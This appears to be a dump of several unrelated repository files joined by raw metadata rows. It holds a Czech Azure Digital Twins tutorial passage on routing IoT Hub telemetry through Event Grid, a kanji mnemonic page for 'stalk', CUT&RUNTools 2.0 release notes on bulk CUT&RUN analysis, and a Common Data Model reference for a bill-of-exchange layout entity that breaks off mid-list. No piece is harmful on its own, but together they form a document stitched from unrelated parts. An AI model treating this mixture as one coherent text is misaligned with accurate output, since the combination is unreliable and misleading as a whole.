V [Azure Portal](https://portal.azure.com/)přejděte na instanci IoT Hub, kterou jste vytvořili v části [*požadavky*](#prerequisites) . V části **události** Vytvořte předplatné pro vaši funkci.
:::image type="content" source="media/how-to-ingest-iot-hub-data/add-event-subscription.png" alt-text="Snímek obrazovky Azure Portal, který ukazuje přidání odběru události":::
Na stránce **vytvořit odběr události** vyplňte pole následujícím způsobem:
1. Pro položku **název** vyberte libovolný název pro odběr události.
2. V případě **schématu událostí** vyberte možnost _Event Grid schéma_.
3. V **části název systémového tématu** vyberte libovolný požadovaný název.
1. Pro **Filtr na typy událostí** vyberte zaškrtávací políčko _telemetrie zařízení_ a zrušte zaškrtnutí ostatních typů událostí.
1. Jako **Typ koncového bodu** vyberte _Azure Function_.
1. V případě **koncového bodu** použijte odkaz _Vybrat koncový bod_ a zvolte, kterou funkci Azure použít pro koncový bod.
:::image type="content" source="media/how-to-ingest-iot-hub-data/create-event-subscription.png" alt-text="Snímek obrazovky Azure Portal k vytvoření podrobností odběru události":::
Na stránce _Vybrat funkci Azure_ , která se otevře, ověřte nebo vyplňte následující podrobnosti.
1. **Předplatné**: vaše předplatné Azure.
2. **Skupina prostředků**: vaše skupina prostředků.
3. **Function App**: název aplikace Function App.
4. **Slot**: _Výroba_.
5. **Funkce**: v rozevíracím seznamu vyberte funkci z předchozí *IoTHubtoTwins*.
Uložte podrobnosti pomocí tlačítka _potvrdit výběr_ .
:::image type="content" source="media/how-to-ingest-iot-hub-data/select-azure-function.png" alt-text="Snímek obrazovky Azure Portal pro výběr funkce":::
Kliknutím na tlačítko _vytvořit_ Vytvořte odběr události.
## <a name="send-simulated-iot-data"></a>Odeslat Simulovaná data IoT
Pokud chcete otestovat novou funkci příchozího přenosu dat, použijte simulátor zařízení z [*kurzu: připojení kompletního řešení*](./tutorial-end-to-end.md). Tento kurz se řídí ukázkovým projektem napsaným v jazyce C#. Vzorový kód je umístěný tady: [Azure Digital dokončí ukázky](/samples/azure-samples/digital-twins-samples/digital-twins-samples). V tomto úložišti budete používat projekt **DeviceSimulator** .
V tomto koncovém kurzu proveďte následující kroky:
1. [*Zaregistrujte simulované zařízení s IoT Hub*](./tutorial-end-to-end.md#register-the-simulated-device-with-iot-hub)
2. [*Konfigurace a spuštění simulace*](./tutorial-end-to-end.md#configure-and-run-the-simulation)
## <a name="validate-your-results"></a>Ověřit výsledky
Při současném spuštění simulátoru zařízení se změní hodnota teplota digitálního vlákna. V Azure CLI spuštěním následujícího příkazu zobrazte hodnotu teploty.
```azurecli-interactive
az dt twin query -q "select * from digitaltwins" -n {digital_twins_instance_name}
```
Výstup by měl obsahovat hodnotu teploty, například:
```json
{
"result": [
{
"$dtId": "thermostat67",
"$etag": "W/\"0000000-1e83-4f7f-b448-524371f64691\"",
"$metadata": {
"$model": "dtmi:contosocom:DigitalTwins:Thermostat;1",
"Temperature": {
"ackCode": 200,
"ackDescription": "Auto-Sync",
"ackVersion": 1,
"desiredValue": 69.75806974934324,
"desiredVersion": 1
}
},
"Temperature": 69.75806974934324
}
]
}
```
Chcete-li zobrazit změnu hodnoty, opakovaně spusťte příkaz dotazu výše.
## <a name="next-steps"></a>Další kroky
Přečtěte si o příchozím a odchozím přenosu dat pomocí digitálních vláken Azure:
* [*Koncepty: integrace s jinými službami*](concepts-integration.md)
| 57.782383 | 410 | 0.765065 | ces_Latn | 0.999313 |
e052a50968546c6e9ef86de2670b654011217e95 | 2,046 | md | Markdown | rtk/rtk1-v6/0772.md | hochanh/hochanh.github.io | 755d537144c230fd29ba84951b8533f5476a79d9 | [
"Apache-2.0"
] | 1 | 2021-03-30T18:58:12.000Z | 2021-03-30T18:58:12.000Z | rtk/rtk1-v6/0772.md | hochanh/hochanh.github.io | 755d537144c230fd29ba84951b8533f5476a79d9 | [
"Apache-2.0"
] | null | null | null | rtk/rtk1-v6/0772.md | hochanh/hochanh.github.io | 755d537144c230fd29ba84951b8533f5476a79d9 | [
"Apache-2.0"
] | null | null | null | ---
layout: kanji
v4: 715
v6: 772
kanji: 茎
keyword: stalk
elements: stalk, flowers, spool, clod, toilet paper, crotch, soil, dirt, ground
strokes: 8
image: E88C8E
on-yomi: ケイ、キョウ
kun-yomi: くき
permalink: /rtk/茎/
prev: 肢
next: 怪
---
1) [<a href="http://kanji.koohii.com/profile/Katsuo">Katsuo</a>] 18-2-2008(196): Suggestion: Replace "spool" with "toilet paper/roll". Reasons: (1) <em>Toilet paper/roll</em> usually comes on a <em>spool</em>. (2) <em>Toilet paper</em> is used to clean the <em>soil</em> off your <em>crotch</em>. Story: Just get a <em>flower</em> and carefully wrap some <em>toilet paper</em> around its<strong> stalk</strong>. Spool also appears in <a href="../v4/716.html">suspicious</a> (#716 怪), <a href="../v4/717.html">lightly</a> (#717 軽), <a href="../v4/882.html">diameter</a> (#882 径), <a href="../v4/1360.html">sutra</a> (#1360 経).
2) [<a href="http://kanji.koohii.com/profile/dingomick">dingomick</a>] 9-8-2007(130): PRIMITIVE: <em>soiled crotch</em> = <em>soiled underwear</em>. To precent anyone from picking the beautiful <em>flower</em>, the gardner hung <em>soiled underwear</em> on the <strong>stalk</strong>.
3) [<a href="http://kanji.koohii.com/profile/nac_est">nac_est</a>] 24-7-2007(83): A <em>flower</em>'s<strong> stalk</strong> can be seen as connecting the <em>flower</em> to the <em>soil</em>, <em>or again</em> the <em>soil</em> to the <em>flower</em>. It depends on how you look at it.
4) [<a href="http://kanji.koohii.com/profile/uberclimber">uberclimber</a>] 15-10-2010(62): Jack and the Bean<strong>stalk</strong>: <em>dirt</em> below, <em>flowers</em> above, and Jack's <em>crotch</em> visible as he climbs up and up. 茎 (くき) :<strong> stalk</strong>.
5) [<a href="http://kanji.koohii.com/profile/ihatobu">ihatobu</a>] 16-9-2007(30): Flowering vines growing up a post or column. The<strong> stalk</strong>s wrap around the post-- again and again-- like a <em>spool </em>of thread, and <em>flowers</em> bloom at the very top. At the bottom, of course, is the soil.
| 75.777778 | 645 | 0.686217 | eng_Latn | 0.512551 |
e05387b51d62505f72856446d97438b73873efb4 | 2,246 | md | Markdown | docs/bulk-news.md | dklcdbi/CUT-RUNTools-2.0 | c5b98798c586f84a2feee18ad21002d90d01ce35 | [
"MIT"
] | null | null | null | docs/bulk-news.md | dklcdbi/CUT-RUNTools-2.0 | c5b98798c586f84a2feee18ad21002d90d01ce35 | [
"MIT"
] | null | null | null | docs/bulk-news.md | dklcdbi/CUT-RUNTools-2.0 | c5b98798c586f84a2feee18ad21002d90d01ce35 | [
"MIT"
] | null | null | null |
#### New features for bulk data analysis
In this release, we provide several new features that were urgently requested by the community. We have also slightly revised the design of our code to make it more flexible and user-friendly for data processing and analysis.
- *supporting spike-in sequence alignment and data normalization*
Users can provide spike-in genome data (usually the E. coli or fly genome) to align their fastq data against. The count of aligned spike-in reads can then be used for normalization of CUT&RUN or CUT&Tag data.
- *option to specify the experiment type for CUT&RUN or CUT&Tag data analysis*
Different enzymes are used in CUT&RUN (pAG-MNase) and CUT&Tag (Tn5) experiments. Although the overall peak-calling strategies for these two types of data are basically the same, footprinting should be handled differently. CUT&Tag reads should be shifted +4 bp on the positive strand and −5 bp on the negative strand to account for the 9-bp duplication created by DNA repair of the nick left by the Tn5 transposase, which achieves base-pair resolution for TF footprint and motif-related analyses (see the sketch after this list). CUT&RUN 2.0 now provides a new option for the user to generate precise cut profiles for footprint analysis of the different experiment types.
- *flexible option for fragment selection (>120 bp)*
The read-filtering step (120 bp size cutoff) works well for finding enriched signal in TF data, but it is not suitable for histone modification data, whose fragment sizes are generally larger than 150 bp. CUT&RUN 2.0 now provides a new option for the user to choose whether to perform this fragment selection according to their data type.
- *different peak calling strategies and new functions for peaks annotation*
Because CUT&RUN and CUT&Tag can broadly detect different types of targets, including different TFs and histone modifications, three commonly used peak-calling methods (MACS2 narrow, MACS2 broad, and SEACR) are provided in CUT&RUN 2.0. Several peak annotation functions are also provided (users can find them in the /src/bulk folder).
- *compatible with more computational platforms*
To be compatible with more computational platforms for bulk data analysis, the requirement for a SLURM job submission environment was removed.
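The +4 bp / −5 bp adjustment described above is the standard Tn5 offset correction. As a rough, self-contained illustration of the idea (this is not code from CUT&RUNTools 2.0, and the file paths are hypothetical), a 6-column BED file of aligned reads could be shifted like this in Python:
```python
# Illustrative sketch only - not part of CUT&RUNTools 2.0.
# Shift read intervals by +4 bp (plus strand) / -5 bp (minus strand),
# one common convention for correcting the 9-bp Tn5 duplication.
import sys

def shift_tn5(in_bed, out_bed):
    with open(in_bed) as src, open(out_bed, "w") as dst:
        for line in src:
            chrom, start, end, name, score, strand = line.rstrip("\n").split("\t")[:6]
            start, end = int(start), int(end)
            if strand == "+":
                start, end = start + 4, end + 4
            else:
                start, end = max(0, start - 5), max(0, end - 5)
            dst.write(f"{chrom}\t{start}\t{end}\t{name}\t{score}\t{strand}\n")

if __name__ == "__main__":
    # usage: python shift_tn5.py reads.bed reads.shifted.bed (file names are examples)
    shift_tn5(sys.argv[1], sys.argv[2])
```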
| 132.117647 | 607 | 0.79252 | eng_Latn | 0.999326 |
e053dac59fe75ba8e9b9e55992ee6f1ddcaee0b2 | 798 | md | Markdown | README.md | jotak08/BATABIT | 8d1ff915b643a693531e51bdaef3ca2feb6b38ae | [
"MIT"
] | 1 | 2022-01-10T20:26:24.000Z | 2022-01-10T20:26:24.000Z | README.md | jotak08/BATABIT | 8d1ff915b643a693531e51bdaef3ca2feb6b38ae | [
"MIT"
] | null | null | null | README.md | jotak08/BATABIT | 8d1ff915b643a693531e51bdaef3ca2feb6b38ae | [
"MIT"
] | null | null | null | <a href="https://github.com/jotak08/BATABIT"><img src="https://i.ibb.co/8Pc5SCr/Group-19.png" alt="Group-19" border="0"></a>
------------
###### Este proyecto fue realizado y orientado por las clases aprendidas del [Curso de Responsive Design: Maquetación Mobile First](https://platzi.com/clases/mobile-first/ "Clases del Curso de Responsive Design: Maquetación Mobile First") de la ESCUELA DE DESARROLLO WEB de [Platzi](https://platzi.com/home "Platzi").
###### - Se creó el frontend de un sitio web partiendo de su wireframe, analizando su arquitectura y construyendo en código cada una de sus partes para que este se adapte a cualquier dispositivo de los usuarios.
------------
###### Los temas y skills aprendidos en este curso son:
- **HTML**
- **CSS**
- **FLEXBOX**
- **MEDIA QUERIES**
| 46.941176 | 317 | 0.705514 | spa_Latn | 0.957227 |
e053f2ddea84b4332353a3b2b4e8276104b334e3 | 23,401 | md | Markdown | common-data-model/schema/core/operationsCommon/Entities/Finance/CashAndBankManagement/BankBillOfExchangeLayoutEntity.md | FabianMSFT/common-data-model-and-service | ca72e2eee6c96e1c55e2b3804459d110082e646b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | common-data-model/schema/core/operationsCommon/Entities/Finance/CashAndBankManagement/BankBillOfExchangeLayoutEntity.md | FabianMSFT/common-data-model-and-service | ca72e2eee6c96e1c55e2b3804459d110082e646b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | common-data-model/schema/core/operationsCommon/Entities/Finance/CashAndBankManagement/BankBillOfExchangeLayoutEntity.md | FabianMSFT/common-data-model-and-service | ca72e2eee6c96e1c55e2b3804459d110082e646b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: BankBillOfExchangeLayoutEntity in CashAndBankManagement - Common Data Model | Microsoft Docs
description: undefined
author: llawwaii
ms.reviewer: deonhe
ms.topic: article
ms.date: 8/7/2020
ms.author: weiluo
---
# Bill of exchange layout in CashAndBankManagement(BankBillOfExchangeLayoutEntity)
Latest version of the JSON entity definition is available on <a href="https://github.com/Microsoft/CDM/tree/master/schemaDocuments/core/operationsCommon/Entities/Finance/CashAndBankManagement/BankBillOfExchangeLayoutEntity.cdm.json" target="_blank">GitHub</a>.
## Traits
<details>
<summary>Traits for this entity are listed below.
</summary>
**is.CDM.entityVersion**
<table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>versionNumber</td><td>"1.1"</td><td>string</td><td>semantic version number of the entity</td></tr></table>
**is.application.releaseVersion**
<table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>releaseVersion</td><td>"10.0.13.0"</td><td>string</td><td>semantic version number of the application introducing this entity</td></tr></table>
**is.localized.displayedAs**
Holds the list of language specific display text for an object. <table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>localizedDisplayText</td><td><table><tr><th>languageTag</th><th>displayText</th></tr><tr><td>en</td><td>Bill of exchange layout</td></tr></table></td><td>entity</td><td>a reference to the constant entity holding the list of localized text</td></tr></table>
</details>
## Attributes
|Name|Description|First Included in Instance|
|---|---|---|
|[AmountPrefix](#AmountPrefix)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintBankAccount](#PrintBankAccount)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[BankAccountId](#BankAccountId)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintBankCity](#PrintBankCity)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintBankName](#PrintBankName)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintBankNumber](#PrintBankNumber)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintCompanyLogo](#PrintCompanyLogo)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintCompanyName](#PrintCompanyName)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintDueDate](#PrintDueDate)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[FormatType](#FormatType)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[NumberMethod](#NumberMethod)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[StartPositionUnit](#StartPositionUnit)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[NumberOfSlipCopies](#NumberOfSlipCopies)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[StartPosition](#StartPosition)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PaperLength](#PaperLength)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PaperLengthUnit](#PaperLengthUnit)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintFirstSignature](#PrintFirstSignature)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[FirstSignatureAmountLimit](#FirstSignatureAmountLimit)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintSecondSignature](#PrintSecondSignature)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[SecondSignatureAmountLimit](#SecondSignatureAmountLimit)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintTransactionDate](#PrintTransactionDate)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[Relationship_BankAccountRelationshipId](#Relationship_BankAccountRelationshipId)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[BackingTable_BankBillOfExchangeLayoutRelationshipId](#BackingTable_BankBillOfExchangeLayoutRelationshipId)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[Relationship_PrimaryCompanyContextRelationshipId](#Relationship_PrimaryCompanyContextRelationshipId)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
### <a href=#AmountPrefix name="AmountPrefix">AmountPrefix</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the AmountPrefix attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintBankAccount name="PrintBankAccount">PrintBankAccount</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintBankAccount attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#BankAccountId name="BankAccountId">BankAccountId</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the BankAccountId attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintBankCity name="PrintBankCity">PrintBankCity</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintBankCity attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintBankName name="PrintBankName">PrintBankName</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintBankName attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintBankNumber name="PrintBankNumber">PrintBankNumber</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintBankNumber attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintCompanyLogo name="PrintCompanyLogo">PrintCompanyLogo</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintCompanyLogo attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintCompanyName name="PrintCompanyName">PrintCompanyName</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintCompanyName attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintDueDate name="PrintDueDate">PrintDueDate</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintDueDate attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#FormatType name="FormatType">FormatType</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the FormatType attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#NumberMethod name="NumberMethod">NumberMethod</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the NumberMethod attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#StartPositionUnit name="StartPositionUnit">StartPositionUnit</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the StartPositionUnit attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#NumberOfSlipCopies name="NumberOfSlipCopies">NumberOfSlipCopies</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the NumberOfSlipCopies attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#StartPosition name="StartPosition">StartPosition</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the StartPosition attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PaperLength name="PaperLength">PaperLength</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PaperLength attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PaperLengthUnit name="PaperLengthUnit">PaperLengthUnit</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PaperLengthUnit attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintFirstSignature name="PrintFirstSignature">PrintFirstSignature</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintFirstSignature attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#FirstSignatureAmountLimit name="FirstSignatureAmountLimit">FirstSignatureAmountLimit</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the FirstSignatureAmountLimit attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintSecondSignature name="PrintSecondSignature">PrintSecondSignature</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintSecondSignature attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#SecondSignatureAmountLimit name="SecondSignatureAmountLimit">SecondSignatureAmountLimit</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the SecondSignatureAmountLimit attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintTransactionDate name="PrintTransactionDate">PrintTransactionDate</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintTransactionDate attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#Relationship_BankAccountRelationshipId name="Relationship_BankAccountRelationshipId">Relationship_BankAccountRelationshipId</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>guid</td></tr></table>
#### Traits
<details>
<summary>List of traits for the Relationship_BankAccountRelationshipId attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.dataFormat.guid**
**means.identity.entityId**
**is.linkedEntity.identifier**
Marks the attribute(s) that hold foreign key references to a linked (used as an attribute) entity. This attribute is added to the resolved entity to enumerate the referenced entities. <table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>entityReferences</td><td>empty table</td><td>entity</td><td>a reference to the constant entity holding the list of entity references</td></tr></table>
**is.dataFormat.guid**
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#BackingTable_BankBillOfExchangeLayoutRelationshipId name="BackingTable_BankBillOfExchangeLayoutRelationshipId">BackingTable_BankBillOfExchangeLayoutRelationshipId</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>guid</td></tr></table>
#### Traits
<details>
<summary>List of traits for the BackingTable_BankBillOfExchangeLayoutRelationshipId attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
